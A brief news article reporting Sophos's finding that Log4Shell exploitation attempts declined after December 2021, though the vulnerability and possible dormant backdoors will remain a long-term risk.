The Log4JShell bug that hit various online services in December has not resulted in immediate crisis, according to cybersecurity firm Sophos, which also warned that the vulnerability remains embedded in many applications and products, making them a target for exploitation for years to come.
From late December to January 2022, attack attempts flattened out and declined, the company found from analysis of customer data, but cyber attackers appear to be still scanning for vulnerabilities in many organisations.
The bug stems from the Log4J software commonly used by a myriad of online services to log events that are happening on software applications and the servers that run them.
In a report today, Sophos’ principal research scientist Chester Wisniewski said the number of successful attacks making use of the vulnerability has been lower than expected.
One reason was the severity of the bug, which united the digital and security communities and galvanised people into action, he added.
“As soon as details of the Log4Shell bug became clear, the world’s biggest and most important cloud services, software packages and enterprises took action to steer away from the iceberg, supported by shared threat intelligence and practical guidance from the security community,” he noted.
Another factor, he explained, was the need to customise the attack to each application that is using the vulnerable code. This meant cyber attackers, some of whom were crypto-miners, had to spend time to tweak their malicious code.
However, this does not mean that the threat is over. On the contrary, it is expected to be a long-term issue, given the widespread use of Log4J and the difficulty in patching or updating all the systems affected.
Some attackers may already have managed to access victims’ servers and set up malware to keep a backdoor open, even as the victims rushed to close the initial loophole, said Wisniewski.
These backdoors are not be utilised until possibly months later, when the hackers wish to mount a larger attack, he noted, adding that this would be consistent with other vulnerabilities that hackers had seized on previously.